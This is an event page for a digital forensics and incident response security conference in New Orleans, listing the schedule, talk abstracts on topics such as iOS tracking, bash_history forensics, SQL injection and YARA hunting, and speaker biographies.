Event details
When:
April
16, 2016
1, 2017
Where:
Hilton Garden Inn New Orleans Convention Center1001 South Peters Street / New Orleans, LA 70130
Note: The venue is a 5-10 minute walk from the French Quarter
Cost: $15
Registration
the Event Brite page:
here.
TODO
CFP
The CFP is now closed. Thanks to all who submitted!
TODO
CFP Reviewers:
- Andrew Case
- Dr. Vico Marziale
- Joe Sylve
8:45
Opening Remarks
9:00
Keynote
When Running Away Isn't an Option: How to Win a Gun Fight When You Only Have a Knife
Darren Van Booven,CISO, Idaho National Laboratory
10:00
The iOS of Sauron -How iOS Tracks Everything You Do
Sarah Edwards
Finding a Kernel in a Haystack
Candice Quates
Proactive Threat Detection on Windows Systems
Devon Kerr
Presentation
Presentation
Presentation
10:50
Break
Break
Break
11:00
Minding the Metacognitive Gap
Chris Sanders
Defining “Reasonable Security” in 2016
David Stampley
Dissecting Windows Host Analysis
Wes Riley
Presentation
Presentation
Presentation
12:00
Lunch
1:00
Database Forensics without the Database
Matt Bromiley
DFIR for LEO
Stephen Villere
You Don't Know Jack About bash_history
Hal Pomeranz
Presentation
Presentation
Presentation
1:50
Break
Break
Break
2:00
Facilitating Fluffy Forensics 2.0
Andrew Hay
Data Protection Law in a Nut Shell
Brian Roux
Presentation
Presentation
Presentation
2:50
Afternoon Break
Afternoon Break
Afternoon Break
3:10
The Web's Most Wanted
Joshua Barone
Logging for Hackers, How we catch commodity and advanced malware
Michael Gough
Presentation
Presentation
Presentation
4:00
Break
Break
Break
4:10
IoT Hacking: Internet of "Embedded Systems" Hacking
Jeremy Allen
Hunt Like a Dentist in Zimbabwe
Jay DiMartino
Presentation
Presentation
Presentation
5:00
Closing Remarks
Closing Remarks
Closing Remarks
Keynote Presentation
When Running Away Isn't an Option: How to Win a Gun Fight When You Only Have a Knife
Darren Van Booven,CISO, Idaho National Laboratory
Abstract
Conventional wisdom says you shouldn't bring a knife to a gun fight, however you can tip the odds in your favor by knowing how to use the tools you have, understanding your adversary, and knowing your own weaknesses. This talk focuses on some recent hints at what is yet to come in the digital threat landscape by looking at some recent technical exploits, drawing upon experience with real cyber operations, to help illustrate the bigger picture. Questions such as Where are we headed? What kinds of tools are needed? What are we do to? and others will be explored from the perspective of someone who used to be the APT.
Biography
Darren Van Booven is responsible for the cyber security program at the Idaho National Laboratory (INL). He is currently focused on industrial control system risk, application vulnerability management, and the insider threat. Darren has over 18 years of information security experience in roles in both government and the private sector. Before INL he was CISO at the U.S. House of Representatives and spent eight years at the Central Intelligence Agency as a senior staff operations officer leading offensive cyber operations targeting against really bad people and performing incident response to nation state threats.
Research Presentations
Database Forensics without the Database -Matt Bromiley -@505Forensics
Databases. You have them; attackers want them. It's where all the good stuff sits. Let's make sure we're defending them the best we can!
In this talk, we're going to introduce and/or improve database forensics in your incident response workflow. Only; we're not going to touch the database. Through analysis of various artifacts, we're going to show you how to build a timeline of attacker activity and discover what may have happened to your data while it was exposed. We're also going to release new research and tools that can be used immediately to include database forensics in your next case.
Data Protection Law in a Nut Shell: From US Data Breach Notification to the EU Safe Harbor - Brian Roux - @digitalinquest
Government regulation of data practices are evolving both domestically and abroad. The US is focusing on data breaches and security practices while the EU is focusing on data privacy and consent. This talk will give an overview of recent and forthcoming changes that impact business practices domestically and abroad.
Defining “Reasonable Security” in 2016 - David Stampley
In 2015, the definition of “reasonable security” was affected by major developments, including a case upholding the FTC’s authority to prosecute unreasonable security practices as unfair trade practices, and another case allowing consumers to go forward in suing a major retailer for a security breach. Last year also saw increased enforcement activity from other federal agencies as well as state attorneys general. These developments help clarify some baseline requirements for security practices. The broader effect of the developments is to emphasize the attention organizations must pay to their security programs—who must have one, what it should look like (minimally), and who can bring enforcement actions for failures.
DFIR for LEO -Stephen Villere
Learn from a local law enforcement forensics lab manager how local law enforcement handlesforensicsinvestigations and the challenges faced while acquiring and processing evidence. DFIR becomes vastly different when suspects do not cooperate and locked devices and encryption can stop you in your tracks.
Don't let Crypto be your Cryptonite! -Martin Borugh - @hackerNinja
Do you know when to use AES over 3DES? What mode AES should you use? is it ok to just use OFB/CFB? Diffie-Hellman who? These answers and much more in the 45 minutes walk through of crypto you use every day may may not know how or why.
Dissecting Windows Host Analysis -Wes Riley - @RSA
Attackers often take a systematic approach to determine vulnerabilities within interactions between various modules and processes. As incident responders, we can take a similar approach when conducting host triage analysis. In this talk, we will look some key aspects of the Windows OS from a modular perspective and identify critical choke-points that assist IR personnel in identifying intrusions more efficiently.
Facilitating Fluffy Forensics 2.0 - Andrew Hay -@andrewsmhay
Cloud computing enables the rapid deployment of servers and applications, dynamic scalability of system resources, and helps businesses get products to market faster than ever before. Most organizations are aware of the benefits of adopting cloud architectures and many are becoming aware of the potential security risks. The majority of organizations, however, don’t realize the numerous challenges of conducting incident response (IR) activities and forensic investigations across public, private, and hybrid cloud environments.
It’s not all doom and gloom, however. The consumption model of cloud architectures actually lends itself to helping investigators conduct forensic and IR exercises faster and more efficiently than on a single workstation. For this to happen, however, the tools and techniques employed must evolve.
In this session, DataGravity CISO Andrew Hay will revisit the forensic and IR challenges of investigating servers and applications in cloud environments in addition to the opportunities that cloud presents to help expedite forensic investigations.
Finding a Kernel in a Haystack - Candice Quates -@candicenonsense
A talk about the contents of your graphics card and what you mightfind there. How and why to acquire memory from NVIDIA GPUs, andanalyze the output. I will share some some early stage analysistechniques and results. Light analysis of cudaHashcat and other neatstuff.
Hunt Like a Dentist in Zimbabwe -Jay DiMartino
You too can hunt like a Dentist for your own "Cecil the Lion". Go from hunted to hunter using your hands. It's time to reclaim your networks and start hunting for big game APT armed with the pattern matching Swiss knife called YARA. Learn how to author YARA rule signatures with techniques used by malware researchers to mercilessly hunt down the elusive adversary of advanced threat actors, and how to apply those signatures in your organization or investigations using YARA.
IoT Hacking: Internet of "Embedded Systems" Things Hacking - Jeremy Allen -@bitexploder
Carve has been hacking IoT device since... well, before they were called "IoT"! I will walk you through some of the coolest bugs we've responsibly disclosed to OEMs (that have now been fixed) and some of our testing methodology. Believe us: we're tired of raising the alarm about IoT insecurity, too. So instead, we're going to show you how to test your own IoT devices and some attack surface that you (maybe) didn't even know was there! We'll also talk about how to set up your networks to minimize the risk from devices that you don't trust which, of course, includes some "what not to do" case studies. We will cover software and hardware hacking as entertainingly as possible.
Logging for Hackers, How we catch commodity and advanced malware with this method, IF only retailers did this and how you can start doing it -Michael Gough -@HackerHurricane
Commodity malware, retail PoS and advanced attacks are hitting enterprises more often than ever before. When such an attack hits your organization can you detect it in one hour? One day? What if I were to tell you that I could compromise your backup, management and Anti-Virus software and utilize them to persist after reboot? What if I were to then show you how we detected this type of attack with adequately configured Windows logs? This talk will cover what tools and methods worked well and what you can start doing today to improve your detection and incident response capabilities. How commodity malware like Dridex, APT like Winnti were detected and how the many Retail PoS breaches could have easily been detected.
Minding the Metacognitive Gap -Chris Sanders - @chrissanders88
As security investigators, even those of us with a great deal of experience aren’t very good at identifying how we perform our jobs successful. Our inability to understand our own thought processes can be defined as a lack of metacognitive awareness, and it negatively impacts our ability to perform investigations efficiently, and to train new apprentice investigators. In this presentation, I’ll discuss the metacognitive gap as it relates to security investigators. This will include a discussion of dual process theory and the role of intuitive and reflective thinking, as well as modern research techniques such as eye gaze tracking that can help us become better as investigators and build better tools to support our endeavors.
This talk will be applicable to new and experienced practitioners. While we I won’t be speaking about bits and bytes, my hope is that discussing matters of the mind will yield discourse that encourages you to become more aware of your own thought processes and to challenge the way you approach investigations.
The iOS of Sauron - How iOS Tracks Everything You Do- Sarah Edwards -@iamevltwin
iOS devices have the ability to track everything the user does - how many steps the user takes, where the user has been, and keeps track of how they use their devices.
This presentation will dive into some of the protected files that keep track of every detail of a user’s life that iOS tracks. These databases and files can be used to correlate user activity down to the smallest detail.
Methods of analysis as well as some scripts will be shown to help analyze these files.
The Web's Most Wanted -Joshua Barone -@tygarsai
The Open Web Application Security Project (OWASP) is a highly respected source for learning about web application vulnerabilities and security practices. They also publish a top ten list that tracks and ranks the most critical web application security flaws. The number one item on this list has been consistently been injection attacks. We will be taking an in-depth look at one of these injection vectors, SQL Injection. To understand this attack vector, we will be looking at the following:
- What is it
- How does it work
- A look at variants
- What can developers and security practitioners do to defend
Live demos will show these attacks in action, as well as how critical the impact of these attacks can be. We will also look at common mistakes that developers make that accidentally bypass the protection methods that are used in various frameworks.
You Don't Know Jack About bash_history - Hal Pomeranz -@hal_pomeranz
The .bash_history file tracks a user's command history and is an important artifact in Linux and Mac forensics. But many investigators don't understand the rules for how and when they are written and can make wrong investigative assumptions. Suspects may attempt anti-forensic techniques to corrupt or remove .bash_history content. In other words, "It's complicated".
Speaker Bios
Andrew Hay - CISO - DataGravity
Andrew Hay is the CISO at DataGravity where he advocates for the company’s total information security needs and is responsible for the development and delivery of the company’s comprehensive information security strategy. Prior to that, Andrew was the Director of Research at OpenDNS (acquired by Cisco) and was the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc.
Brian Roux - Attorney - Hangartner, Rydberg & Terrell
Dr. Roux brings considerable technical expertise to the practice of law. Prior to becoming an attorney, he spent many years in private practice as a forensic computer scientist where he conducted investigations, addressed data breach containment, provided expert testimony, worked as a third party neutral, and served as a special master. He is a published author and public speaker on intersections of law, technology, ethics, and public policy with a special emphasis on digital forensics and cyber security related topics. Brian’s practice involves complex litigation, electronic discovery, data breaches, cyber liability, privacy law, and intellectual property. Brian is available to advise clients on potential cyber liability exposure, assist clients in responding to a cyber event or data breach, and defend clients in the eventual litigation that stems from such events
Candice Quates
Candice Quates is an independent security researcher. Formerly affiliated with the University of New Orleans, she made sdhash fast and useful and rewrote the algorithm to work in CUDA. She spends her nights in the software consulting trenches.
Chris Sanders - Senior Analyst - FireEye
Chris Sanders is an information security author and researcher originally from Mayfield, Kentucky, now living in rural north Georgia. Chris is the manager of a detection and investigation research team at FireEye. He has extensive experience supporting government and military agencies, as well as several Fortune 500 companies. In multiple roles with the US Department of Defense, Chris helped to create several NSM and intelligence tools currently being used to defend the interests of the nation.
Chris has authored several books and articles, including the international best seller “Practical Packet Analysis”, currently in its second edition and in seven languages, and “Applied Network Security Monitoring” from Syngress. He holds multiple industry certifications, including the SANS GSE distinction, as well as a BS in Telecommunications and an MS in Homeland Security. He is currently pursuing a PhD in Cognitive Psychology in an attempt to enhance the field of security investigative technique through a better understanding of the human thought and learning processes.
Chris is also the founder and director of the Rural Technology Fund, a non-profit that donates thousands of dollars in scholarships and equipment annually to further technical education in rural and high poverty areas. The RTF is committed to building ten makerspace labs in public schools in 2016.
Chris blogs at http://www.chrissanders.org. You can learn more about the RTF at http://www.ruraltechfund.org.
David Stampley - Partner - KamberLaw
Dave Stampley has been described by a federal judge as an attorney with “recognized experience in complex litigation involving technology and privacy issues” and by security professionals as a lawyer who “gets it.” In 16 years practicing privacy and security law, Stampley has counseled companies about compliance and prosecuted them for non-compliance. As an assistant attorney general in the New York A.G.’s Internet Bureau, he led multistate coalitions in cases against DoubleClick, Ziff Davis Media, and Netscape. He served as privacy officer for a Fortune 1000 technology provider and as general counsel and consultant at Neohapsis. He is a CIPP and a partner at KamberLaw, where he litigates technology class actions. He began his legal career as a prosecutor in the Manhattan D.A.’s Office.
Hal Pomeranz - Principal - Deer Run Associates
Hal Pomeranz is an independent digital forensic investigator who has consulted on cases ranging from intellectual property theft, to employee sabotage, to organized cybercrime and malicious software infrastructures. He has worked with law enforcement agencies in the US and Europe and global corporations. While equally at home in the Windows or Mac environment, Hal is recognized as an expert in the analysis of Linux and Unix systems. Hal is a SANS Faculty Fellow and Lethal Forensicator, and is the creator of the SANS Linux/Unix Security track (GCUX). He holds the GCFA, GNFA, and GREM certifications and teaches the related courses in the SANS Forensics curriculum.
Jay DiMartino - Sr. Cyber Threat Researcher - Fidelis Cybersecurity
Jay DiMartino is a threat researcher for Fidelis Cybersecurity. He has been doing Malware Reverse Engineering for over 5 years and also has several industry certifications including the GREM and GCFA.
Jeremy Allen - Partner - Carve Systems
Jeremy started writing code for MUDs (Multi User Dungeons), the predecessors to MMORPGs, on a 66 Mhz 486 running Slackware Linux in 1995, he has never been the same since. Jeremy is responsible for conducting risk assessments, threat modeling, code reviews, application security assessments, research, and reverse engineering. He has discovered numerous critical flaws and bugs. He helps organizations by understanding their key risks and building security into their organization (through people, processes, and the technology stack). Jeremy has been an Information security consultant for over 10 years. Similar version will be given at OWASP SnowFROC and potentially other locations. As stated earlier, we like to change things up a little bit when talking about IoT as it is always topical and we are always working on new devices. I have given talks at Bsides before (iOS mobile stuff in ATL a while back, as I am an Atlanta native). I developed Mallory (https://github.com/CarveSystems/Mallory/) and gave a talk on it at BlackHat. I have been through a zillion information security talks at this point and I try to keep my talks on point, entertaining, and leave everyone in the audience with something useful after the fact. I really strive to have a talk with great content and a great presentation that captivates my audience and keeps them entertained for the length of my time slot.
Joshua Barone - Senior Developer - BlackBag Technologies
Joshua Barone has over 12 years of experience as a software developer, with a majority of that time specialized in security design and development. Joshua Barone has a core background in Java, .Net, Python, and security design principles. Joshua specializes in .Net and Java Enterprise technologies, Web Services, Agile Methodologies, Open Source, and Test-Driven Development. He is familiar with a variety of platforms (Windows, Mac OS X, Linux, Unix), databases (PostrgreSQL, MySQL, MSSQL, Oracle), J2EE Application Servers, Software Development Methodologies and Tools. Joshua is also experienced in security vulnerability assessment for platforms and applications. Joshua is a Certified Information System Security Professional (CISSP) and holds GIAC Security Essentials (GSEC), Certified Incident Handler (GCIH), and Web Application Penetration Tester (GWAPT) certifications, as well as a Master's in Computer Science from the University of New Orleans. He is currently a Senior Developer at BlackBag Technologies.
Martin Borugh - Global Director of Cyber Security - TBWA World Wide
I was a cryptographer technician in the Marine Corps for 1999 to 2004. After the Marines I wanted to get some grass roots work in IT to build up my overall knowledge. Worked as a sysadmin and worked my way up to IT Director over the past 16 years. Concentrated on focusing my career path in information security. I have been doing consulting work with government agencies for many years. I am currently working in developing a new, unbreakable algorithm.
Matt Bromiley - Senior Consultant - Mandiant
Matt Bromiley - Matt has over 4 years’ experience in incident response, digital forensics, and network security monitoring. His skills include disk, database, and network forensics, incident response/triage, and log analytics. Matt has helped organizations of all sizes with their forensic and IR needs. He also has a passion for Mac & Linux forensics, as well as building scalable analysis tools utilizing free and open source software. Matt’s passion for DFIR helps him explore new topics with hopes of addressing previously-unanswered questions.
When not jamming with the console cowboys in cyberspace, Matt can be found with his family, sometimes hidden in a cloud of sweet, delicious smoke of a Texas BBQ pit.
Michael Gough - Malware Archaeology LLC
Michael (CISSP, CISA and CSIH) is a Malware Archaeologist, Blue Team defender, Active Defender, Incident Responder, Information Security professional and logoholic. Michael developed the “Malware Management Framework” to improve malware discovery and detect and response capabilities. Michael also authored several Windows logging cheat sheets to help the security industry understand Windows logging, where to start and what to look for. Michael is co-developer of LOG-MD, a free tool that audits, set, collects and report on malicious Windows log data and malicious system artifacts. Michael’s responsible disclosures involve cardkey system exploits and vulnerabilities with leading security products. Michael has also Michael’s background includes 20 years of security consulting for Fortune 500 organizations with HP, health care, financial and gaming industries. Michael also ran BSides Texas for five years for the Austin, San Antonio, Dallas and Houston cons. Michael is also blogs on HackerHurricane.com on various InfoSec topics.
Sarah Edwards -Digital Forensic Analyst/Mac Nerd - Parsons Corporation
Sarah is an senior digital forensic analyst who has worked with various federal law enforcement agencies. She has performed a variety of investigations including computer intrusions, criminal, counter‐intelligence, counter-narcotic, and counter‐terrorism. Sarah's research and analytical interests include Mac forensics, mobile device forensics, digital profiling and malware reverse engineering. Sarah has presented at many industry conferences including; Shmoocon, CEIC, Bsides*, Defcon and the SANS DFIR Summit. She has a Bachelor of Science in Information Technology from Rochester Institute of Technology and a Masters in Information Assurance from Capitol College. Sarah is the author of the SANS Mac Forensic Analysis Course - FOR518.
Wes Riley - Advisory IR Consultant - RSA
Jack "Wes" Riley is an Advisory Practice Consultant for the Incident Response / Discovery Practice at RSA. In this capacity, Wes is tasked assisting clients in obtaining situational awareness and rapidly identifying threats as part of tactical response to intrusions. In addition, Wes performs threat research and develops content and techniques that can be used by clients to identify compromise. Wes has worked in DFIR since 2008, and has performed forensic and response work for U.S Army Corps of Engineers CIRT, DOD High Performance Computing, and Mississippi State University. Wes is also a former U.S. Army Signal Officer, having served with the 184th Expeditionary Sustainment Command, Camp Shelby, Mississippi.
Planners
Organizers:
Vico Marziale - @vicomarziale
Andrew Case - @attrc